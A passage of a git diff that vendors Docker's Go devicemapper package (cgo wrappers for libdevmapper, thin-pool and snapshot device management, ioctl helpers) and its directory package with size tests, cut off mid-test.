+func LogInit(logger DevmapperLogger) { + dmLogger = logger + LogWithErrnoInit() +} + +// SetDevDir sets the dev folder for the device mapper library (usually /dev). +func SetDevDir(dir string) error { + if res := DmSetDevDir(dir); res != 1 { + logrus.Debug("devicemapper: Error dm_set_dev_dir") + return ErrSetDevDir + } + return nil +} + +// GetLibraryVersion returns the device mapper library version. +func GetLibraryVersion() (string, error) { + var version string + if res := DmGetLibraryVersion(&version); res != 1 { + return "", ErrGetLibraryVersion + } + return version, nil +} + +// UdevSyncSupported returns whether device-mapper is able to sync with udev +// +// This is essential otherwise race conditions can arise where both udev and +// device-mapper attempt to create and destroy devices. +func UdevSyncSupported() bool { + return DmUdevGetSyncSupport() != 0 +} + +// UdevSetSyncSupport allows setting whether the udev sync should be enabled. +// The return bool indicates the state of whether the sync is enabled. +func UdevSetSyncSupport(enable bool) bool { + if enable { + DmUdevSetSyncSupport(1) + } else { + DmUdevSetSyncSupport(0) + } + + return UdevSyncSupported() +} + +// CookieSupported returns whether the version of device-mapper supports the +// use of cookie's in the tasks. +// This is largely a lower level call that other functions use. +func CookieSupported() bool { + return DmCookieSupported() != 0 +} + +// RemoveDevice is a useful helper for cleaning up a device. 
+func RemoveDevice(name string) error { + task, err := TaskCreateNamed(deviceRemove, name) + if task == nil { + return err + } + + var cookie uint + if err := task.setCookie(&cookie, 0); err != nil { + return fmt.Errorf("devicemapper: Can not set cookie: %s", err) + } + defer UdevWait(&cookie) + + dmSawBusy = false // reset before the task is run + if err = task.run(); err != nil { + if dmSawBusy { + return ErrBusy + } + return fmt.Errorf("devicemapper: Error running RemoveDevice %s", err) + } + + return nil +} + +// RemoveDeviceDeferred is a useful helper for cleaning up a device, but deferred. +func RemoveDeviceDeferred(name string) error { + logrus.Debugf("devicemapper: RemoveDeviceDeferred START(%s)", name) + defer logrus.Debugf("devicemapper: RemoveDeviceDeferred END(%s)", name) + task, err := TaskCreateNamed(deviceRemove, name) + if task == nil { + return err + } + + if err := DmTaskDeferredRemove(task.unmanaged); err != 1 { + return ErrTaskDeferredRemove + } + + // set a task cookie and disable library fallback, or else libdevmapper will + // disable udev dm rules and delete the symlink under /dev/mapper by itself, + // even if the removal is deferred by the kernel. + var cookie uint + var flags uint16 + flags = DmUdevDisableLibraryFallback + if err := task.setCookie(&cookie, flags); err != nil { + return fmt.Errorf("devicemapper: Can not set cookie: %s", err) + } + + // libdevmapper and udev relies on System V semaphore for synchronization, + // semaphores created in `task.setCookie` will be cleaned up in `UdevWait`. + // So these two function call must come in pairs, otherwise semaphores will + // be leaked, and the limit of number of semaphores defined in `/proc/sys/kernel/sem` + // will be reached, which will eventually make all follwing calls to 'task.SetCookie' + // fail. 
+ // this call will not wait for the deferred removal's final executing, since no + // udev event will be generated, and the semaphore's value will not be incremented + // by udev, what UdevWait is just cleaning up the semaphore. + defer UdevWait(&cookie) + + if err = task.run(); err != nil { + return fmt.Errorf("devicemapper: Error running RemoveDeviceDeferred %s", err) + } + + return nil +} + +// CancelDeferredRemove cancels a deferred remove for a device. +func CancelDeferredRemove(deviceName string) error { + task, err := TaskCreateNamed(deviceTargetMsg, deviceName) + if task == nil { + return err + } + + if err := task.setSector(0); err != nil { + return fmt.Errorf("devicemapper: Can't set sector %s", err) + } + + if err := task.setMessage(fmt.Sprintf("@cancel_deferred_remove")); err != nil { + return fmt.Errorf("devicemapper: Can't set message %s", err) + } + + dmSawBusy = false + dmSawEnxio = false + if err := task.run(); err != nil { + // A device might be being deleted already + if dmSawBusy { + return ErrBusy + } else if dmSawEnxio { + return ErrEnxio + } + return fmt.Errorf("devicemapper: Error running CancelDeferredRemove %s", err) + + } + return nil +} + +// GetBlockDeviceSize returns the size of a block device identified by the specified file. +func GetBlockDeviceSize(file *os.File) (uint64, error) { + size, err := ioctlBlkGetSize64(file.Fd()) + if err != nil { + logrus.Errorf("devicemapper: Error getblockdevicesize: %s", err) + return 0, ErrGetBlockSize + } + return uint64(size), nil +} + +// BlockDeviceDiscard runs discard for the given path. 
+// This is used as a workaround for the kernel not discarding block so +// on the thin pool when we remove a thinp device, so we do it +// manually +func BlockDeviceDiscard(path string) error { + file, err := os.OpenFile(path, os.O_RDWR, 0) + if err != nil { + return err + } + defer file.Close() + + size, err := GetBlockDeviceSize(file) + if err != nil { + return err + } + + if err := ioctlBlkDiscard(file.Fd(), 0, size); err != nil { + return err + } + + // Without this sometimes the remove of the device that happens after + // discard fails with EBUSY. + syscall.Sync() + + return nil +} + +// CreatePool is the programmatic example of "dmsetup create". +// It creates a device with the specified poolName, data and metadata file and block size. +func CreatePool(poolName string, dataFile, metadataFile *os.File, poolBlockSize uint32) error { + task, err := TaskCreateNamed(deviceCreate, poolName) + if task == nil { + return err + } + + size, err := GetBlockDeviceSize(dataFile) + if err != nil { + return fmt.Errorf("devicemapper: Can't get data size %s", err) + } + + params := fmt.Sprintf("%s %s %d 32768 1 skip_block_zeroing", metadataFile.Name(), dataFile.Name(), poolBlockSize) + if err := task.addTarget(0, size/512, "thin-pool", params); err != nil { + return fmt.Errorf("devicemapper: Can't add target %s", err) + } + + var cookie uint + var flags uint16 + flags = DmUdevDisableSubsystemRulesFlag | DmUdevDisableDiskRulesFlag | DmUdevDisableOtherRulesFlag + if err := task.setCookie(&cookie, flags); err != nil { + return fmt.Errorf("devicemapper: Can't set cookie %s", err) + } + defer UdevWait(&cookie) + + if err := task.run(); err != nil { + return fmt.Errorf("devicemapper: Error running deviceCreate (CreatePool) %s", err) + } + + return nil +} + +// ReloadPool is the programmatic example of "dmsetup reload". +// It reloads the table with the specified poolName, data and metadata file and block size. 
+func ReloadPool(poolName string, dataFile, metadataFile *os.File, poolBlockSize uint32) error { + task, err := TaskCreateNamed(deviceReload, poolName) + if task == nil { + return err + } + + size, err := GetBlockDeviceSize(dataFile) + if err != nil { + return fmt.Errorf("devicemapper: Can't get data size %s", err) + } + + params := fmt.Sprintf("%s %s %d 32768 1 skip_block_zeroing", metadataFile.Name(), dataFile.Name(), poolBlockSize) + if err := task.addTarget(0, size/512, "thin-pool", params); err != nil { + return fmt.Errorf("devicemapper: Can't add target %s", err) + } + + if err := task.run(); err != nil { + return fmt.Errorf("devicemapper: Error running deviceCreate %s", err) + } + + return nil +} + +// GetDeps is the programmatic example of "dmsetup deps". +// It outputs a list of devices referenced by the live table for the specified device. +func GetDeps(name string) (*Deps, error) { + task, err := TaskCreateNamed(deviceDeps, name) + if task == nil { + return nil, err + } + if err := task.run(); err != nil { + return nil, err + } + return task.getDeps() +} + +// GetInfo is the programmatic example of "dmsetup info". +// It outputs some brief information about the device. +func GetInfo(name string) (*Info, error) { + task, err := TaskCreateNamed(deviceInfo, name) + if task == nil { + return nil, err + } + if err := task.run(); err != nil { + return nil, err + } + return task.getInfo() +} + +// GetInfoWithDeferred is the programmatic example of "dmsetup info", but deferred. +// It outputs some brief information about the device. +func GetInfoWithDeferred(name string) (*Info, error) { + task, err := TaskCreateNamed(deviceInfo, name) + if task == nil { + return nil, err + } + if err := task.run(); err != nil { + return nil, err + } + return task.getInfoWithDeferred() +} + +// GetDriverVersion is the programmatic example of "dmsetup version". +// It outputs version information of the driver. 
+func GetDriverVersion() (string, error) { + task := TaskCreate(deviceVersion) + if task == nil { + return "", fmt.Errorf("devicemapper: Can't create deviceVersion task") + } + if err := task.run(); err != nil { + return "", err + } + return task.getDriverVersion() +} + +// GetStatus is the programmatic example of "dmsetup status". +// It outputs status information for the specified device name. +func GetStatus(name string) (uint64, uint64, string, string, error) { + task, err := TaskCreateNamed(deviceStatus, name) + if task == nil { + logrus.Debugf("devicemapper: GetStatus() Error TaskCreateNamed: %s", err) + return 0, 0, "", "", err + } + if err := task.run(); err != nil { + logrus.Debugf("devicemapper: GetStatus() Error Run: %s", err) + return 0, 0, "", "", err + } + + devinfo, err := task.getInfo() + if err != nil { + logrus.Debugf("devicemapper: GetStatus() Error GetInfo: %s", err) + return 0, 0, "", "", err + } + if devinfo.Exists == 0 { + logrus.Debugf("devicemapper: GetStatus() Non existing device %s", name) + return 0, 0, "", "", fmt.Errorf("devicemapper: Non existing device %s", name) + } + + _, start, length, targetType, params := task.getNextTarget(unsafe.Pointer(nil)) + return start, length, targetType, params, nil +} + +// GetTable is the programmatic example for "dmsetup table". +// It outputs the current table for the specified device name. 
+func GetTable(name string) (uint64, uint64, string, string, error) { + task, err := TaskCreateNamed(deviceTable, name) + if task == nil { + logrus.Debugf("devicemapper: GetTable() Error TaskCreateNamed: %s", err) + return 0, 0, "", "", err + } + if err := task.run(); err != nil { + logrus.Debugf("devicemapper: GetTable() Error Run: %s", err) + return 0, 0, "", "", err + } + + devinfo, err := task.getInfo() + if err != nil { + logrus.Debugf("devicemapper: GetTable() Error GetInfo: %s", err) + return 0, 0, "", "", err + } + if devinfo.Exists == 0 { + logrus.Debugf("devicemapper: GetTable() Non existing device %s", name) + return 0, 0, "", "", fmt.Errorf("devicemapper: Non existing device %s", name) + } + + _, start, length, targetType, params := task.getNextTarget(unsafe.Pointer(nil)) + return start, length, targetType, params, nil +} + +// SetTransactionID sets a transaction id for the specified device name. +func SetTransactionID(poolName string, oldID uint64, newID uint64) error { + task, err := TaskCreateNamed(deviceTargetMsg, poolName) + if task == nil { + return err + } + + if err := task.setSector(0); err != nil { + return fmt.Errorf("devicemapper: Can't set sector %s", err) + } + + if err := task.setMessage(fmt.Sprintf("set_transaction_id %d %d", oldID, newID)); err != nil { + return fmt.Errorf("devicemapper: Can't set message %s", err) + } + + if err := task.run(); err != nil { + return fmt.Errorf("devicemapper: Error running SetTransactionID %s", err) + } + return nil +} + +// SuspendDevice is the programmatic example of "dmsetup suspend". +// It suspends the specified device. +func SuspendDevice(name string) error { + task, err := TaskCreateNamed(deviceSuspend, name) + if task == nil { + return err + } + if err := task.run(); err != nil { + return fmt.Errorf("devicemapper: Error running deviceSuspend %s", err) + } + return nil +} + +// ResumeDevice is the programmatic example of "dmsetup resume". +// It un-suspends the specified device. 
+func ResumeDevice(name string) error { + task, err := TaskCreateNamed(deviceResume, name) + if task == nil { + return err + } + + var cookie uint + if err := task.setCookie(&cookie, 0); err != nil { + return fmt.Errorf("devicemapper: Can't set cookie %s", err) + } + defer UdevWait(&cookie) + + if err := task.run(); err != nil { + return fmt.Errorf("devicemapper: Error running deviceResume %s", err) + } + + return nil +} + +// CreateDevice creates a device with the specified poolName with the specified device id. +func CreateDevice(poolName string, deviceID int) error { + logrus.Debugf("devicemapper: CreateDevice(poolName=%v, deviceID=%v)", poolName, deviceID) + task, err := TaskCreateNamed(deviceTargetMsg, poolName) + if task == nil { + return err + } + + if err := task.setSector(0); err != nil { + return fmt.Errorf("devicemapper: Can't set sector %s", err) + } + + if err := task.setMessage(fmt.Sprintf("create_thin %d", deviceID)); err != nil { + return fmt.Errorf("devicemapper: Can't set message %s", err) + } + + dmSawExist = false // reset before the task is run + if err := task.run(); err != nil { + // Caller wants to know about ErrDeviceIDExists so that it can try with a different device id. + if dmSawExist { + return ErrDeviceIDExists + } + + return fmt.Errorf("devicemapper: Error running CreateDevice %s", err) + + } + return nil +} + +// DeleteDevice deletes a device with the specified poolName with the specified device id. 
+func DeleteDevice(poolName string, deviceID int) error { + task, err := TaskCreateNamed(deviceTargetMsg, poolName) + if task == nil { + return err + } + + if err := task.setSector(0); err != nil { + return fmt.Errorf("devicemapper: Can't set sector %s", err) + } + + if err := task.setMessage(fmt.Sprintf("delete %d", deviceID)); err != nil { + return fmt.Errorf("devicemapper: Can't set message %s", err) + } + + dmSawBusy = false + if err := task.run(); err != nil { + if dmSawBusy { + return ErrBusy + } + return fmt.Errorf("devicemapper: Error running DeleteDevice %s", err) + } + return nil +} + +// ActivateDevice activates the device identified by the specified +// poolName, name and deviceID with the specified size. +func ActivateDevice(poolName string, name string, deviceID int, size uint64) error { + return activateDevice(poolName, name, deviceID, size, "") +} + +// ActivateDeviceWithExternal activates the device identified by the specified +// poolName, name and deviceID with the specified size. 
+func ActivateDeviceWithExternal(poolName string, name string, deviceID int, size uint64, external string) error { + return activateDevice(poolName, name, deviceID, size, external) +} + +func activateDevice(poolName string, name string, deviceID int, size uint64, external string) error { + task, err := TaskCreateNamed(deviceCreate, name) + if task == nil { + return err + } + + var params string + if len(external) > 0 { + params = fmt.Sprintf("%s %d %s", poolName, deviceID, external) + } else { + params = fmt.Sprintf("%s %d", poolName, deviceID) + } + if err := task.addTarget(0, size/512, "thin", params); err != nil { + return fmt.Errorf("devicemapper: Can't add target %s", err) + } + if err := task.setAddNode(addNodeOnCreate); err != nil { + return fmt.Errorf("devicemapper: Can't add node %s", err) + } + + var cookie uint + if err := task.setCookie(&cookie, 0); err != nil { + return fmt.Errorf("devicemapper: Can't set cookie %s", err) + } + + defer UdevWait(&cookie) + + if err := task.run(); err != nil { + return fmt.Errorf("devicemapper: Error running deviceCreate (ActivateDevice) %s", err) + } + + return nil +} + +// CreateSnapDeviceRaw creates a snapshot device. Caller needs to suspend and resume the origin device if it is active. +func CreateSnapDeviceRaw(poolName string, deviceID int, baseDeviceID int) error { + task, err := TaskCreateNamed(deviceTargetMsg, poolName) + if task == nil { + return err + } + + if err := task.setSector(0); err != nil { + return fmt.Errorf("devicemapper: Can't set sector %s", err) + } + + if err := task.setMessage(fmt.Sprintf("create_snap %d %d", deviceID, baseDeviceID)); err != nil { + return fmt.Errorf("devicemapper: Can't set message %s", err) + } + + dmSawExist = false // reset before the task is run + if err := task.run(); err != nil { + // Caller wants to know about ErrDeviceIDExists so that it can try with a different device id. 
+ if dmSawExist { + return ErrDeviceIDExists + } + return fmt.Errorf("devicemapper: Error running deviceCreate (createSnapDevice) %s", err) + } + + return nil +} + +// CreateSnapDevice creates a snapshot based on the device identified by the baseName and baseDeviceId, +func CreateSnapDevice(poolName string, deviceID int, baseName string, baseDeviceID int) error { + devinfo, _ := GetInfo(baseName) + doSuspend := devinfo != nil && devinfo.Exists != 0 + + if doSuspend { + if err := SuspendDevice(baseName); err != nil { + return err + } + } + + if err := CreateSnapDeviceRaw(poolName, deviceID, baseDeviceID); err != nil { + if doSuspend { + if err2 := ResumeDevice(baseName); err2 != nil { + return fmt.Errorf("CreateSnapDeviceRaw Error: (%v): ResumeDevice Error: (%v)", err, err2) + } + } + return err + } + + if doSuspend { + if err := ResumeDevice(baseName); err != nil { + return err + } + } + + return nil +} diff --git a/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_log.go b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_log.go new file mode 100644 index 0000000000..8477e36fec --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_log.go @@ -0,0 +1,35 @@ +// +build linux + +package devicemapper + +import "C" + +import ( + "strings" +) + +// Due to the way cgo works this has to be in a separate file, as devmapper.go has +// definitions in the cgo block, which is incompatible with using "//export" + +// DevmapperLogCallback exports the devmapper log callback for cgo. 
+//export DevmapperLogCallback +func DevmapperLogCallback(level C.int, file *C.char, line C.int, dmErrnoOrClass C.int, message *C.char) { + msg := C.GoString(message) + if level < 7 { + if strings.Contains(msg, "busy") { + dmSawBusy = true + } + + if strings.Contains(msg, "File exists") { + dmSawExist = true + } + + if strings.Contains(msg, "No such device or address") { + dmSawEnxio = true + } + } + + if dmLogger != nil { + dmLogger.DMLog(int(level), C.GoString(file), int(line), int(dmErrnoOrClass), msg) + } +} diff --git a/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper.go b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper.go new file mode 100644 index 0000000000..91fbc85b3a --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper.go @@ -0,0 +1,251 @@ +// +build linux + +package devicemapper + +/* +#cgo LDFLAGS: -L. -ldevmapper +#include +#include // FIXME: present only for BLKGETSIZE64, maybe we can remove it? + +// FIXME: Can't we find a way to do the logging in pure Go? +extern void DevmapperLogCallback(int level, char *file, int line, int dm_errno_or_class, char *str); + +static void log_cb(int level, const char *file, int line, int dm_errno_or_class, const char *f, ...) +{ + char buffer[256]; + va_list ap; + + va_start(ap, f); + vsnprintf(buffer, 256, f, ap); + va_end(ap); + + DevmapperLogCallback(level, (char *)file, line, dm_errno_or_class, buffer); +} + +static void log_with_errno_init() +{ + dm_log_with_errno_init(log_cb); +} +*/ +import "C" + +import ( + "reflect" + "unsafe" +) + +type ( + cdmTask C.struct_dm_task +) + +// IOCTL consts +const ( + BlkGetSize64 = C.BLKGETSIZE64 + BlkDiscard = C.BLKDISCARD +) + +// Devicemapper cookie flags. 
+const ( + DmUdevDisableSubsystemRulesFlag = C.DM_UDEV_DISABLE_SUBSYSTEM_RULES_FLAG + DmUdevDisableDiskRulesFlag = C.DM_UDEV_DISABLE_DISK_RULES_FLAG + DmUdevDisableOtherRulesFlag = C.DM_UDEV_DISABLE_OTHER_RULES_FLAG + DmUdevDisableLibraryFallback = C.DM_UDEV_DISABLE_LIBRARY_FALLBACK +) + +// DeviceMapper mapped functions. +var ( + DmGetLibraryVersion = dmGetLibraryVersionFct + DmGetNextTarget = dmGetNextTargetFct + DmLogInitVerbose = dmLogInitVerboseFct + DmSetDevDir = dmSetDevDirFct + DmTaskAddTarget = dmTaskAddTargetFct + DmTaskCreate = dmTaskCreateFct + DmTaskDestroy = dmTaskDestroyFct + DmTaskGetDeps = dmTaskGetDepsFct + DmTaskGetInfo = dmTaskGetInfoFct + DmTaskGetDriverVersion = dmTaskGetDriverVersionFct + DmTaskRun = dmTaskRunFct + DmTaskSetAddNode = dmTaskSetAddNodeFct + DmTaskSetCookie = dmTaskSetCookieFct + DmTaskSetMessage = dmTaskSetMessageFct + DmTaskSetName = dmTaskSetNameFct + DmTaskSetRo = dmTaskSetRoFct + DmTaskSetSector = dmTaskSetSectorFct + DmUdevWait = dmUdevWaitFct + DmUdevSetSyncSupport = dmUdevSetSyncSupportFct + DmUdevGetSyncSupport = dmUdevGetSyncSupportFct + DmCookieSupported = dmCookieSupportedFct + LogWithErrnoInit = logWithErrnoInitFct + DmTaskDeferredRemove = dmTaskDeferredRemoveFct + DmTaskGetInfoWithDeferred = dmTaskGetInfoWithDeferredFct +) + +func free(p *C.char) { + C.free(unsafe.Pointer(p)) +} + +func dmTaskDestroyFct(task *cdmTask) { + C.dm_task_destroy((*C.struct_dm_task)(task)) +} + +func dmTaskCreateFct(taskType int) *cdmTask { + return (*cdmTask)(C.dm_task_create(C.int(taskType))) +} + +func dmTaskRunFct(task *cdmTask) int { + ret, _ := C.dm_task_run((*C.struct_dm_task)(task)) + return int(ret) +} + +func dmTaskSetNameFct(task *cdmTask, name string) int { + Cname := C.CString(name) + defer free(Cname) + + return int(C.dm_task_set_name((*C.struct_dm_task)(task), Cname)) +} + +func dmTaskSetMessageFct(task *cdmTask, message string) int { + Cmessage := C.CString(message) + defer free(Cmessage) + + return 
int(C.dm_task_set_message((*C.struct_dm_task)(task), Cmessage)) +} + +func dmTaskSetSectorFct(task *cdmTask, sector uint64) int { + return int(C.dm_task_set_sector((*C.struct_dm_task)(task), C.uint64_t(sector))) +} + +func dmTaskSetCookieFct(task *cdmTask, cookie *uint, flags uint16) int { + cCookie := C.uint32_t(*cookie) + defer func() { + *cookie = uint(cCookie) + }() + return int(C.dm_task_set_cookie((*C.struct_dm_task)(task), &cCookie, C.uint16_t(flags))) +} + +func dmTaskSetAddNodeFct(task *cdmTask, addNode AddNodeType) int { + return int(C.dm_task_set_add_node((*C.struct_dm_task)(task), C.dm_add_node_t(addNode))) +} + +func dmTaskSetRoFct(task *cdmTask) int { + return int(C.dm_task_set_ro((*C.struct_dm_task)(task))) +} + +func dmTaskAddTargetFct(task *cdmTask, + start, size uint64, ttype, params string) int { + + Cttype := C.CString(ttype) + defer free(Cttype) + + Cparams := C.CString(params) + defer free(Cparams) + + return int(C.dm_task_add_target((*C.struct_dm_task)(task), C.uint64_t(start), C.uint64_t(size), Cttype, Cparams)) +} + +func dmTaskGetDepsFct(task *cdmTask) *Deps { + Cdeps := C.dm_task_get_deps((*C.struct_dm_task)(task)) + if Cdeps == nil { + return nil + } + + // golang issue: https://github.com/golang/go/issues/11925 + hdr := reflect.SliceHeader{ + Data: uintptr(unsafe.Pointer(uintptr(unsafe.Pointer(Cdeps)) + unsafe.Sizeof(*Cdeps))), + Len: int(Cdeps.count), + Cap: int(Cdeps.count), + } + devices := *(*[]C.uint64_t)(unsafe.Pointer(&hdr)) + + deps := &Deps{ + Count: uint32(Cdeps.count), + Filler: uint32(Cdeps.filler), + } + for _, device := range devices { + deps.Device = append(deps.Device, uint64(device)) + } + return deps +} + +func dmTaskGetInfoFct(task *cdmTask, info *Info) int { + Cinfo := C.struct_dm_info{} + defer func() { + info.Exists = int(Cinfo.exists) + info.Suspended = int(Cinfo.suspended) + info.LiveTable = int(Cinfo.live_table) + info.InactiveTable = int(Cinfo.inactive_table) + info.OpenCount = int32(Cinfo.open_count) + 
info.EventNr = uint32(Cinfo.event_nr) + info.Major = uint32(Cinfo.major) + info.Minor = uint32(Cinfo.minor) + info.ReadOnly = int(Cinfo.read_only) + info.TargetCount = int32(Cinfo.target_count) + }() + return int(C.dm_task_get_info((*C.struct_dm_task)(task), &Cinfo)) +} + +func dmTaskGetDriverVersionFct(task *cdmTask) string { + buffer := C.malloc(128) + defer C.free(buffer) + res := C.dm_task_get_driver_version((*C.struct_dm_task)(task), (*C.char)(buffer), 128) + if res == 0 { + return "" + } + return C.GoString((*C.char)(buffer)) +} + +func dmGetNextTargetFct(task *cdmTask, next unsafe.Pointer, start, length *uint64, target, params *string) unsafe.Pointer { + var ( + Cstart, Clength C.uint64_t + CtargetType, Cparams *C.char + ) + defer func() { + *start = uint64(Cstart) + *length = uint64(Clength) + *target = C.GoString(CtargetType) + *params = C.GoString(Cparams) + }() + + nextp := C.dm_get_next_target((*C.struct_dm_task)(task), next, &Cstart, &Clength, &CtargetType, &Cparams) + return nextp +} + +func dmUdevSetSyncSupportFct(syncWithUdev int) { + (C.dm_udev_set_sync_support(C.int(syncWithUdev))) +} + +func dmUdevGetSyncSupportFct() int { + return int(C.dm_udev_get_sync_support()) +} + +func dmUdevWaitFct(cookie uint) int { + return int(C.dm_udev_wait(C.uint32_t(cookie))) +} + +func dmCookieSupportedFct() int { + return int(C.dm_cookie_supported()) +} + +func dmLogInitVerboseFct(level int) { + C.dm_log_init_verbose(C.int(level)) +} + +func logWithErrnoInitFct() { + C.log_with_errno_init() +} + +func dmSetDevDirFct(dir string) int { + Cdir := C.CString(dir) + defer free(Cdir) + + return int(C.dm_set_dev_dir(Cdir)) +} + +func dmGetLibraryVersionFct(version *string) int { + buffer := C.CString(string(make([]byte, 128))) + defer free(buffer) + defer func() { + *version = C.GoString(buffer) + }() + return int(C.dm_get_library_version(buffer, 128)) +} diff --git a/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_deferred_remove.go 
b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_deferred_remove.go new file mode 100644 index 0000000000..dc361eab76 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_deferred_remove.go @@ -0,0 +1,34 @@ +// +build linux,!libdm_no_deferred_remove + +package devicemapper + +/* +#cgo LDFLAGS: -L. -ldevmapper +#include +*/ +import "C" + +// LibraryDeferredRemovalSupport is supported when statically linked. +const LibraryDeferredRemovalSupport = true + +func dmTaskDeferredRemoveFct(task *cdmTask) int { + return int(C.dm_task_deferred_remove((*C.struct_dm_task)(task))) +} + +func dmTaskGetInfoWithDeferredFct(task *cdmTask, info *Info) int { + Cinfo := C.struct_dm_info{} + defer func() { + info.Exists = int(Cinfo.exists) + info.Suspended = int(Cinfo.suspended) + info.LiveTable = int(Cinfo.live_table) + info.InactiveTable = int(Cinfo.inactive_table) + info.OpenCount = int32(Cinfo.open_count) + info.EventNr = uint32(Cinfo.event_nr) + info.Major = uint32(Cinfo.major) + info.Minor = uint32(Cinfo.minor) + info.ReadOnly = int(Cinfo.read_only) + info.TargetCount = int32(Cinfo.target_count) + info.DeferredRemove = int(Cinfo.deferred_remove) + }() + return int(C.dm_task_get_info((*C.struct_dm_task)(task), &Cinfo)) +} diff --git a/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_no_deferred_remove.go b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_no_deferred_remove.go new file mode 100644 index 0000000000..8249ccf854 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_no_deferred_remove.go @@ -0,0 +1,15 @@ +// +build linux,libdm_no_deferred_remove + +package devicemapper + +// LibraryDeferredRemovalSupport is not supported when statically linked. +const LibraryDeferredRemovalSupport = false + +func dmTaskDeferredRemoveFct(task *cdmTask) int { + // Error. Nobody should be calling it. 
+ return -1 +} + +func dmTaskGetInfoWithDeferredFct(task *cdmTask, info *Info) int { + return -1 +} diff --git a/vendor/github.com/docker/docker/pkg/devicemapper/ioctl.go b/vendor/github.com/docker/docker/pkg/devicemapper/ioctl.go new file mode 100644 index 0000000000..581b57eb86 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/devicemapper/ioctl.go @@ -0,0 +1,27 @@ +// +build linux + +package devicemapper + +import ( + "syscall" + "unsafe" +) + +func ioctlBlkGetSize64(fd uintptr) (int64, error) { + var size int64 + if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, BlkGetSize64, uintptr(unsafe.Pointer(&size))); err != 0 { + return 0, err + } + return size, nil +} + +func ioctlBlkDiscard(fd uintptr, offset, length uint64) error { + var r [2]uint64 + r[0] = offset + r[1] = length + + if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, BlkDiscard, uintptr(unsafe.Pointer(&r[0]))); err != 0 { + return err + } + return nil +} diff --git a/vendor/github.com/docker/docker/pkg/devicemapper/log.go b/vendor/github.com/docker/docker/pkg/devicemapper/log.go new file mode 100644 index 0000000000..cee5e54549 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/devicemapper/log.go @@ -0,0 +1,11 @@ +package devicemapper + +// definitions from lvm2 lib/log/log.h +const ( + LogLevelFatal = 2 + iota // _LOG_FATAL + LogLevelErr // _LOG_ERR + LogLevelWarn // _LOG_WARN + LogLevelNotice // _LOG_NOTICE + LogLevelInfo // _LOG_INFO + LogLevelDebug // _LOG_DEBUG +) diff --git a/vendor/github.com/docker/docker/pkg/directory/directory.go b/vendor/github.com/docker/docker/pkg/directory/directory.go new file mode 100644 index 0000000000..1715ef45d9 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/directory/directory.go @@ -0,0 +1,26 @@ +package directory + +import ( + "io/ioutil" + "os" + "path/filepath" +) + +// MoveToSubdir moves all contents of a directory to a subdirectory underneath the original path +func MoveToSubdir(oldpath, subdir string) error { + + infos, err 
:= ioutil.ReadDir(oldpath) + if err != nil { + return err + } + for _, info := range infos { + if info.Name() != subdir { + oldName := filepath.Join(oldpath, info.Name()) + newName := filepath.Join(oldpath, subdir, info.Name()) + if err := os.Rename(oldName, newName); err != nil { + return err + } + } + } + return nil +} diff --git a/vendor/github.com/docker/docker/pkg/directory/directory_test.go b/vendor/github.com/docker/docker/pkg/directory/directory_test.go new file mode 100644 index 0000000000..2b7a4657be --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/directory/directory_test.go @@ -0,0 +1,192 @@ +package directory + +import ( + "io/ioutil" + "os" + "path/filepath" + "reflect" + "sort" + "testing" +) + +// Size of an empty directory should be 0 +func TestSizeEmpty(t *testing.T) { + var dir string + var err error + if dir, err = ioutil.TempDir(os.TempDir(), "testSizeEmptyDirectory"); err != nil { + t.Fatalf("failed to create directory: %s", err) + } + + var size int64 + if size, _ = Size(dir); size != 0 { + t.Fatalf("empty directory has size: %d", size) + } +} + +// Size of a directory with one empty file should be 0 +func TestSizeEmptyFile(t *testing.T) { + var dir string + var err error + if dir, err = ioutil.TempDir(os.TempDir(), "testSizeEmptyFile"); err != nil { + t.Fatalf("failed to create directory: %s", err) + } + + var file *os.File + if file, err = ioutil.TempFile(dir, "file"); err != nil { + t.Fatalf("failed to create file: %s", err) + } + + var size int64 + if size, _ = Size(file.Name()); size != 0 { + t.Fatalf("directory with one file has size: %d", size) + } +} + +// Size of a directory with one 5-byte file should be 5 +func TestSizeNonemptyFile(t *testing.T) { + var dir string + var err error + if dir, err = ioutil.TempDir(os.TempDir(), "testSizeNonemptyFile"); err != nil { + t.Fatalf("failed to create directory: %s", err) + } + + var file *os.File + if file, err = ioutil.TempFile(dir, "file"); err != nil { + t.Fatalf("failed to create 
file: %s", err) + } + + d := []byte{97, 98, 99, 100, 101} + file.Write(d) + + var size int64 + if size, _ = Size(file.Name()); size != 5 { + t.Fatalf("directory with one 5-byte file has size: %d", size) + } +} + +// Size of a directory with one empty directory should be 0 +func TestSizeNestedDirectoryEmpty(t *testing.T) { + var dir string + var err error + if dir, err = ioutil.TempDir(os.TempDir(), "testSizeNestedDirectoryEmpty"); err != nil { + t.Fatalf("failed to create directory: %s", err) + } + if dir, err = ioutil.TempDir(dir, "nested"); err != nil { + t.Fatalf("failed to create nested directory: %s", err) + } + + var size int64 + if size, _ = Size(dir); size != 0 { + t.Fatalf("directory with one empty directory has size: %d", size) + } +} + +// Test directory with 1 file and 1 empty directory +func TestSizeFileAndNestedDirectoryEmpty(t *testing.T) { + var dir string + var err error + if dir, err = ioutil.TempDir(os.TempDir(), "testSizeFileAndNestedDirectoryEmpty"); err != nil { + t.Fatalf("failed to create directory: %s", err) + } + if dir, err = ioutil.TempDir(dir, "nested"); err != nil { + t.Fatalf("failed to create nested directory: %s", err) + } + + var file *os.File + if file, err = ioutil.TempFile(dir, "file"); err != nil { + t.Fatalf("failed to create file: %s", err) + } + + d := []byte{100, 111, 99, 107, 101, 